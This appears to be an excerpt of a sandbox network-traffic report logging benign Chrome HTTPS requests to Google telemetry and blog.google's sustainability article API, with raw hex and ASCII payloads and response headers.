                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:54 UTC1068OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 62 6f 71 5f 6f 6e 65 67 6f 6f 67 6c 65 68 74 74 70 73 65 72 76 65 72 5f 32 30 32 34 30 39 32 33 2e 30 30 5f 70 30 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 33 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31
                                                                                                                                                                                                                                                                                          Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"boq_onegooglehttpserver_20240923.00_p0",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[3,0,0,0,0]]],1
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:54 UTC518INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ogs.google.com
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:54 GMT
                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:54 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          132192.168.2.750033216.58.206.834435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:54 UTC589OUTGET /api/v2/latest/?tags=sustainability HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.blog.google
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://sustainability.google
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://sustainability.google/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:55 UTC373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                          Location: https://blog.google/api/v2/latest/?tags=sustainability
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://sustainability.google
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 6791dce4dca4b4d4acd23967af5ab0db
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:55 GMT
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 314
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:55 UTC314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 33 2e 32 20 46 69 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 73 68 6f 75 6c 64 20 62 65 20 72 65 64 69 72 65 63 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 74 6f 20 74 61 72 67 65 74 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 6c 6f 67 2e 67 6f 6f 67 6c 65 2f 61 70 69 2f 76 32 2f 6c 61 74 65 73 74 2f 3f 74 61 67 73 3d 73 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 3e 68 74 74 70 73 3a 2f 2f 62 6c 6f 67 2e 67 6f 6f 67 6c 65 2f 61 70 69
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be redirected automatically to target URL: <a href="https://blog.google/api/v2/latest/?tags=sustainability">https://blog.google/api


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          133192.168.2.750039216.239.38.214435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC560OUTGET /api/v2/latest/?tags=sustainability HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: blog.google
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: null
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://sustainability.google/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC2626INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          content-security-policy: font-src 'self' themes.googleusercontent.com *.gstatic.com https://fonts.gstatic.com storage.googleapis.com fonts.googleapis.com *.cdn.ampproject.org; connect-src 'self' cdn.ampproject.org *.google.com storage.googleapis.com https://services.google.com/fb/submissions/thekeywordtest/ https://services.google.com/fb/submissions/0a65d7733e1f11ea9701614fc033d30c/ *.gstatic.com gstatic.com *.cdn.ampproject.org *.doubleclick.net https://readaloud.googleapis.com/ *.google-analytics.com; require-trusted-types-for 'script'; default-src 'self' *.gstatic.com storage.googleapis.com; frame-src 'self' www.google.com *.youtube.com youtube.com accounts.google.com *.doubleclick.net apis.google.com optimize.google.com *.google.com *.cdn.ampproject.org https://www.gstatic.com/ https://www.youtube-nocookie.com/; base-uri 'none'; media-src 'self' data: *.gstatic.com storage.googleapis.com *.googlevideo.com; object-src 'none'; style-src 'self' 'unsafe-inline' fonts.googleapis.com *.gstatic.com storage.googl [TRUNCATED]
                                                                                                                                                                                                                                                                                          content-language: en-us
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: null
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 6e4fd9d8183b37125f78b6ab69e5b836
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:56 GMT
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 17791
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC676INData Raw: 7b 22 6d 65 74 61 22 3a 7b 22 74 6f 74 61 6c 5f 63 6f 75 6e 74 22 3a 33 36 32 7d 2c 22 6e 65 78 74 5f 70 61 67 65 22 3a 22 2f 61 70 69 2f 76 32 2f 6c 61 74 65 73 74 3f 70 61 67 69 6e 61 74 65 3d 31 32 26 74 61 67 73 3d 73 75 73 74 61 69 6e 61 62 69 6c 69 74 79 26 66 69 65 6c 64 73 3d 26 69 73 5f 6d 61 69 6e 5f 68 65 72 6f 3d 46 61 6c 73 65 26 73 68 6f 77 5f 68 65 72 6f 3d 54 72 75 65 26 63 75 72 73 6f 72 3d 32 22 2c 22 72 65 73 75 6c 74 73 22 3a 5b 7b 22 65 79 65 62 72 6f 77 22 3a 22 3c 74 69 6d 65 20 63 6c 61 73 73 3d 5c 22 75 6e 69 2d 74 69 6d 65 73 69 6e 63 65 5c 22 20 64 61 74 65 74 69 6d 65 3d 5c 22 32 30 32 34 2d 30 39 2d 31 39 20 31 33 3a 30 30 3a 30 30 2b 30 30 3a 30 30 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 22 53 65 70 74 65 6d 62 65 72 20
                                                                                                                                                                                                                                                                                          Data Ascii: {"meta":{"total_count":362},"next_page":"/api/v2/latest?paginate=12&tags=sustainability&fields=&is_main_hero=False&show_hero=True&cursor=2","results":[{"eyebrow":"<time class=\"uni-timesince\" datetime=\"2024-09-19 13:00:00+00:00\" aria-label=\"September
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC1408INData Raw: 72 69 6f 22 2c 22 74 61 67 5f 6e 61 6d 65 22 3a 22 44 61 74 61 20 43 65 6e 74 65 72 73 20 61 6e 64 20 49 6e 66 72 61 73 74 72 75 63 74 75 72 65 22 2c 22 73 69 74 65 73 70 61 63 65 5f 72 65 6e 64 65 72 22 3a 22 22 2c 22 73 69 74 65 73 70 61 63 65 22 3a 22 22 2c 22 77 6f 72 64 5f 63 6f 75 6e 74 22 3a 37 32 37 2c 22 70 75 62 6c 69 73 68 65 64 5f 72 65 61 64 61 62 6c 65 5f 64 61 74 65 22 3a 22 53 65 70 20 31 39 22 2c 22 74 61 67 5f 65 79 65 62 72 6f 77 22 3a 22 68 74 74 70 73 3a 2f 2f 62 6c 6f 67 2e 67 6f 6f 67 6c 65 2f 69 6e 73 69 64 65 2d 67 6f 6f 67 6c 65 2f 69 6e 66 72 61 73 74 72 75 63 74 75 72 65 2f 22 2c 22 70 75 62 6c 69 73 68 65 64 5f 6e 6f 64 65 22 3a 22 3c 74 69 6d 65 20 63 6c 61 73 73 3d 5c 22 75 6e 69 2d 74 69 6d 65 73 69 6e 63 65 5c 22 20 64 61
                                                                                                                                                                                                                                                                                          Data Ascii: rio","tag_name":"Data Centers and Infrastructure","sitespace_render":"","sitespace":"","word_count":727,"published_readable_date":"Sep 19","tag_eyebrow":"https://blog.google/inside-google/infrastructure/","published_node":"<time class=\"uni-timesince\" da
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC1408INData Raw: 65 74 65 63 74 20 61 6e 64 20 74 72 61 63 6b 20 77 69 6c 64 66 69 72 65 73 20 74 68 65 20 73 69 7a 65 20 6f 66 20 61 20 63 6c 61 73 73 72 6f 6f 6d 20 77 69 74 68 69 6e 20 32 30 20 6d 69 6e 75 74 65 73 2e 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 61 72 74 69 63 6c 65 22 2c 22 61 75 74 68 6f 72 22 3a 22 43 68 72 69 73 74 6f 70 68 65 72 20 56 61 6e 20 41 72 73 64 61 6c 65 22 2c 22 74 61 67 5f 6e 61 6d 65 22 3a 22 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 2c 22 73 69 74 65 73 70 61 63 65 5f 72 65 6e 64 65 72 22 3a 22 22 2c 22 73 69 74 65 73 70 61 63 65 22 3a 22 22 2c 22 77 6f 72 64 5f 63 6f 75 6e 74 22 3a 34 36 37 2c 22 70 75 62 6c 69 73 68 65 64 5f 72 65 61 64 61 62 6c 65 5f 64 61 74 65 22 3a 22 53 65 70 20 31 36 22 2c 22 74 61 67 5f 65 79 65 62 72 6f 77
                                                                                                                                                                                                                                                                                          Data Ascii: etect and track wildfires the size of a classroom within 20 minutes.","category":"article","author":"Christopher Van Arsdale","tag_name":"Sustainability","sitespace_render":"","sitespace":"","word_count":467,"published_readable_date":"Sep 16","tag_eyebrow
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC1408INData Raw: 3a 22 57 65 e2 80 99 72 65 20 61 6e 6e 6f 75 6e 63 69 6e 67 20 61 20 6e 65 77 20 64 65 61 6c 20 74 6f 20 70 75 72 63 68 61 73 65 20 63 61 72 62 6f 6e 20 72 65 6d 6f 76 61 6c 20 63 72 65 64 69 74 73 20 66 72 6f 6d 20 48 6f 6c 6f 63 65 6e 65 2c 20 61 74 20 74 68 65 20 6c 6f 77 65 73 74 20 70 72 69 63 65 20 6f 6e 20 72 65 63 6f 72 64 20 66 6f 72 20 64 69 72 65 63 74 20 61 69 72 20 63 61 70 74 75 72 65 2e 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 61 72 74 69 63 6c 65 22 2c 22 61 75 74 68 6f 72 22 3a 22 52 61 6e 64 79 20 53 70 6f 63 6b 22 2c 22 74 61 67 5f 6e 61 6d 65 22 3a 22 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 2c 22 73 69 74 65 73 70 61 63 65 5f 72 65 6e 64 65 72 22 3a 22 22 2c 22 73 69 74 65 73 70 61 63 65 22 3a 22 22 2c 22 77 6f 72 64 5f 63 6f 75
                                                                                                                                                                                                                                                                                          Data Ascii: :"Were announcing a new deal to purchase carbon removal credits from Holocene, at the lowest price on record for direct air capture.","category":"article","author":"Randy Spock","tag_name":"Sustainability","sitespace_render":"","sitespace":"","word_cou
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC1408INData Raw: 53 2e 6a 70 67 22 2c 22 74 61 67 73 22 3a 22 72 65 73 65 61 72 63 68 2c 73 75 73 74 61 69 6e 61 62 69 6c 69 74 79 2c 61 69 22 2c 22 73 75 6d 6d 61 72 79 22 3a 22 4f 75 72 20 6e 65 77 20 48 65 61 74 20 52 65 73 69 6c 69 65 6e 63 65 20 74 6f 6f 6c 20 75 73 65 73 20 41 49 20 74 6f 20 68 65 6c 70 20 63 69 74 69 65 73 20 70 72 69 6f 72 69 74 69 7a 65 20 77 68 65 72 65 20 74 6f 20 69 6d 70 6c 65 6d 65 6e 74 20 63 6f 6f 6c 69 6e 67 20 73 74 72 61 74 65 67 69 65 73 2e 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 61 72 74 69 63 6c 65 22 2c 22 61 75 74 68 6f 72 22 3a 22 44 61 76 69 64 20 46 6f 72 6b 2c 20 4d 61 6e 73 69 20 4b 61 6e 73 61 6c 22 2c 22 74 61 67 5f 6e 61 6d 65 22 3a 22 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 2c 22 73 69 74 65 73 70 61 63 65 5f 72 65
                                                                                                                                                                                                                                                                                          Data Ascii: S.jpg","tags":"research,sustainability,ai","summary":"Our new Heat Resilience tool uses AI to help cities prioritize where to implement cooling strategies.","category":"article","author":"David Fork, Mansi Kansal","tag_name":"Sustainability","sitespace_re
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC1408INData Raw: 2d 70 72 6f 64 2f 6f 72 69 67 69 6e 61 6c 5f 69 6d 61 67 65 73 2f 49 6d 61 67 65 5f 32 30 32 34 30 38 31 36 5f 31 33 30 39 30 32 5f 39 39 31 2e 70 6e 67 22 2c 22 74 61 67 73 22 3a 22 73 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 2c 22 73 75 6d 6d 61 72 79 22 3a 22 57 65 e2 80 99 72 65 20 61 6e 6e 6f 75 6e 63 69 6e 67 20 6e 65 77 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 73 20 77 69 74 68 20 45 6e 65 72 67 69 78 20 52 65 6e 65 77 61 62 6c 65 73 20 61 6e 64 20 53 77 69 66 74 20 43 75 72 72 65 6e 74 20 45 6e 65 72 67 79 20 74 6f 20 73 75 70 70 6f 72 74 20 6f 75 72 20 63 6c 65 61 6e 20 65 6e 65 72 67 79 20 63 6f 6d 6d 69 74 6d 65 6e 74 73 20 69 6e 20 74 68 65 20 55 2e 53 2e 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 61 72 74 69 63 6c 65 22 2c 22 61 75 74 68 6f
                                                                                                                                                                                                                                                                                          Data Ascii: -prod/original_images/Image_20240816_130902_991.png","tags":"sustainability","summary":"Were announcing new collaborations with Energix Renewables and Swift Current Energy to support our clean energy commitments in the U.S.","category":"article","autho
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC1408INData Raw: 6c 3d 5c 22 41 75 67 75 73 74 20 32 30 5c 22 3e 41 75 67 20 32 30 3c 2f 74 69 6d 65 3e 20 2f 20 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 2c 22 67 6f 5f 6c 69 76 65 5f 64 61 74 65 5f 74 69 6d 65 22 3a 22 32 30 32 34 2d 30 38 2d 32 30 7c 31 33 3a 30 30 22 2c 22 68 65 72 6f 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 67 77 65 62 2d 75 6e 69 62 6c 6f 67 2d 70 75 62 6c 69 73 68 2d 70 72 6f 64 2f 6f 72 69 67 69 6e 61 6c 5f 69 6d 61 67 65 73 2f 67 6f 6f 67 6c 65 5f 73 65 65 64 5f 73 74 69 6c 6c 73 5f 31 36 78 39 5f 30 33 2e 6a 70 67 22 2c 22 74 61 67 73 22 3a 22 67 6f 6f 67 6c 65 2d 6e 65 73 74 2c 70 72 6f 64 75 63 74 73 2d 66 69 74 62 69 74 2c 73 75 73 74 61 69 6e 61 62 69 6c 69 74 79 2c 70 69 78 65
                                                                                                                                                                                                                                                                                          Data Ascii: l=\"August 20\">Aug 20</time> / Sustainability","go_live_date_time":"2024-08-20|13:00","hero":"https://storage.googleapis.com/gweb-uniblog-publish-prod/original_images/google_seed_stills_16x9_03.jpg","tags":"google-nest,products-fitbit,sustainability,pixe
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC1408INData Raw: 65 73 22 2c 22 68 65 72 6f 5f 6d 65 64 69 61 5f 74 79 70 65 22 3a 22 76 69 64 65 6f 22 7d 7d 2c 7b 22 65 79 65 62 72 6f 77 22 3a 22 3c 74 69 6d 65 20 63 6c 61 73 73 3d 5c 22 75 6e 69 2d 74 69 6d 65 73 69 6e 63 65 5c 22 20 64 61 74 65 74 69 6d 65 3d 5c 22 32 30 32 34 2d 30 37 2d 32 39 20 32 32 3a 30 31 3a 30 30 2b 30 30 3a 30 30 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 22 4a 75 6c 79 20 32 39 5c 22 3e 4a 75 6c 20 32 39 3c 2f 74 69 6d 65 3e 20 2f 20 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 2c 22 67 6f 5f 6c 69 76 65 5f 64 61 74 65 5f 74 69 6d 65 22 3a 22 32 30 32 34 2d 30 37 2d 32 39 7c 32 32 3a 30 31 22 2c 22 68 65 72 6f 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 67 77 65 62 2d 75 6e 69 62
                                                                                                                                                                                                                                                                                          Data Ascii: es","hero_media_type":"video"}},{"eyebrow":"<time class=\"uni-timesince\" datetime=\"2024-07-29 22:01:00+00:00\" aria-label=\"July 29\">Jul 29</time> / Sustainability","go_live_date_time":"2024-07-29|22:01","hero":"https://storage.googleapis.com/gweb-unib
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC1408INData Raw: 74 5f 63 61 74 65 67 6f 72 79 22 3a 22 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 22 2c 22 61 6e 61 6c 79 74 69 63 73 5f 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 68 61 73 5f 63 61 72 6f 75 73 65 6c 22 3a 22 6e 6f 22 2c 22 68 61 73 5f 69 6d 61 67 65 22 3a 22 79 65 73 22 2c 22 68 61 73 5f 61 75 64 69 6f 22 3a 22 6e 6f 22 2c 22 68 61 73 5f 76 69 64 65 6f 22 3a 22 6e 6f 22 2c 22 68 65 72 6f 5f 6d 65 64 69 61 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 22 7d 7d 2c 7b 22 65 79 65 62 72 6f 77 22 3a 22 3c 74 69 6d 65 20 63 6c 61 73 73 3d 5c 22 75 6e 69 2d 74 69 6d 65 73 69 6e 63 65 5c 22 20 64 61 74 65 74 69 6d 65 3d 5c 22 32 30 32 34 2d 30 37 2d 32 39 20 31 34 3a 30 35 3a 30 30 2b 30 30 3a 30 30 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 22 4a 75 6c 79 20 32 39 5c 22 3e
                                                                                                                                                                                                                                                                                          Data Ascii: t_category":"Announcement","analytics_properties":{"has_carousel":"no","has_image":"yes","has_audio":"no","has_video":"no","hero_media_type":"image"}},{"eyebrow":"<time class=\"uni-timesince\" datetime=\"2024-07-29 14:05:00+00:00\" aria-label=\"July 29\">
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:56 UTC1024INData Raw: 74 5f 63 61 74 65 67 6f 72 79 22 3a 22 45 64 69 74 6f 72 69 61 6c 20 66 65 61 74 75 72 65 22 2c 22 61 6e 61 6c 79 74 69 63 73 5f 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 68 61 73 5f 63 61 72 6f 75 73 65 6c 22 3a 22 6e 6f 22 2c 22 68 61 73 5f 69 6d 61 67 65 22 3a 22 79 65 73 22 2c 22 68 61 73 5f 61 75 64 69 6f 22 3a 22 6e 6f 22 2c 22 68 61 73 5f 76 69 64 65 6f 22 3a 22 79 65 73 22 2c 22 68 65 72 6f 5f 6d 65 64 69 61 5f 74 79 70 65 22 3a 22 67 69 66 22 7d 7d 2c 7b 22 65 79 65 62 72 6f 77 22 3a 22 3c 74 69 6d 65 20 63 6c 61 73 73 3d 5c 22 75 6e 69 2d 74 69 6d 65 73 69 6e 63 65 5c 22 20 64 61 74 65 74 69 6d 65 3d 5c 22 32 30 32 34 2d 30 37 2d 30 32 20 31 36 3a 30 30 3a 30 30 2b 30 30 3a 30 30 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 22 4a 75 6c 79 20 30
                                                                                                                                                                                                                                                                                          Data Ascii: t_category":"Editorial feature","analytics_properties":{"has_carousel":"no","has_image":"yes","has_audio":"no","has_video":"yes","hero_media_type":"gif"}},{"eyebrow":"<time class=\"uni-timesince\" datetime=\"2024-07-02 16:00:00+00:00\" aria-label=\"July 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          134192.168.2.750046216.239.38.214435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC369OUTGET /api/v2/latest/?tags=sustainability HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: blog.google
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC2577INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          content-security-policy: font-src 'self' themes.googleusercontent.com *.gstatic.com https://fonts.gstatic.com storage.googleapis.com fonts.googleapis.com *.cdn.ampproject.org; connect-src 'self' cdn.ampproject.org *.google.com storage.googleapis.com https://services.google.com/fb/submissions/thekeywordtest/ https://services.google.com/fb/submissions/0a65d7733e1f11ea9701614fc033d30c/ *.gstatic.com gstatic.com *.cdn.ampproject.org *.doubleclick.net https://readaloud.googleapis.com/ *.google-analytics.com; require-trusted-types-for 'script'; default-src 'self' *.gstatic.com storage.googleapis.com; frame-src 'self' www.google.com *.youtube.com youtube.com accounts.google.com *.doubleclick.net apis.google.com optimize.google.com *.google.com *.cdn.ampproject.org https://www.gstatic.com/ https://www.youtube-nocookie.com/; base-uri 'none'; media-src 'self' data: *.gstatic.com storage.googleapis.com *.googlevideo.com; object-src 'none'; style-src 'self' 'unsafe-inline' fonts.googleapis.com *.gstatic.com storage.googl [TRUNCATED]
                                                                                                                                                                                                                                                                                          content-language: en-us
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 7789a6c335fbc8bd0476e099916df3cf
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:57 GMT
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 17791
                                                                                                                                                                                                                                                                                          Connection: close
